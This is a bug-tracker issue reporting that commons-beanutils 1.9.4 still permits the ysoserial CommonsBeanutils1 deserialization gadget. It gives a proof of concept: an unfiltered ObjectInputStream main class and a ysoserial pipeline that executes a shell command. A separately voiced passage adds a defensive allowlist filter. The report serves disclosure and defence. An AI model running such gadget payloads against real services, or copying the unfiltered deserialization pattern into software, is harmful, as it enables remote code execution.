
Commons Beanutils 1.9.4 allows building a deserialization gadget


Details

    • Type: Bug
    • Status: Open
    • Priority: Critical
    • Resolution: Unresolved
    • Affects Version/s: 1.9.4
    • Fix Version/s: None
    • Component/s: Bean / Property Utils

    Description

      commons-beanutils 1.9.4 makes it possible to build a simple deserialization gadget. It has been part of the famous ysoserial gadget collection (https://github.com/frohoff/ysoserial) for many years already.

      ysoserial references version 1.9.2, but it is very simple to verify that everything works just fine with version 1.9.4 as well:

      main class:

      import java.io.*;

      public class Main {
          public static void main (String [] args) throws Exception {
              // Deserializes whatever arrives on stdin with no filter applied
              ObjectInputStream in = new ObjectInputStream (System.in);
              in.readObject ();
          }
      }

      and then

      java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "touch /tmp/whatever" | java -cp .:commons-beanutils-1.9.4.jar:commons-collections-3.2.2.jar:commons-logging-1.2.jar Main
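A defensive counterpart to the Main class above, added here as an example and not code from this issue or from Commons BeanUtils: the same stdin read, but with a JDK 9+ ObjectInputFilter (JEP 290) that allowlists only the types the program is assumed to expect (String and Integer, a hypothetical choice) and logs every class it refuses, so a stream carrying a gadget chain is rejected at its first non-allowlisted class before any gadget class is resolved.

```java
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.util.Set;

public class FilteredMain {
    // Hypothetical allowlist: the only types this program legitimately expects on the stream.
    static final Set<String> ALLOWED = Set.of("java.lang.String", "java.lang.Integer");

    // Every class named in the stream is checked here before it is resolved or instantiated,
    // so a gadget chain is stopped at its outermost object, not inside some readObject().
    static final ObjectInputFilter ALLOWLIST = info -> {
        // Resource limits first: a legitimate String or Integer is shallow and tiny.
        if (info.depth() > 4 || info.references() > 50 || info.streamBytes() > 64 * 1024) {
            System.err.println("filter: stream limit exceeded");
            return ObjectInputFilter.Status.REJECTED;
        }
        Class<?> clazz = info.serialClass();
        if (clazz == null) {
            return ObjectInputFilter.Status.UNDECIDED; // back-reference check, no class involved
        }
        while (clazz.isArray()) {
            clazz = clazz.getComponentType(); // arrays are judged by their element type
        }
        if (clazz.isPrimitive() || ALLOWED.contains(clazz.getName())) {
            return ObjectInputFilter.Status.ALLOWED;
        }
        // Detection signal: record what the stream tried to load, then refuse it.
        System.err.println("filter: rejected class " + clazz.getName());
        return ObjectInputFilter.Status.REJECTED;
    };

    public static void main(String[] args) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(System.in)) {
            in.setObjectInputFilter(ALLOWLIST);
            Object o = in.readObject();
            System.out.println("accepted " + o.getClass().getName() + ": " + o);
        } catch (InvalidClassException e) {
            // A REJECTED status surfaces as InvalidClassException("filter status: REJECTED").
            System.err.println("deserialization refused: " + e.getMessage());
        }
    }
}
```

The same allowlist can be expressed declaratively with ObjectInputFilter.Config.createFilter("java.lang.String;java.lang.Integer;!*") or process-wide via -Djdk.serialFilter, at the cost of the per-class log line.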


            Assignee: Unassigned
            Reporter: Kai Ullrich (supersache)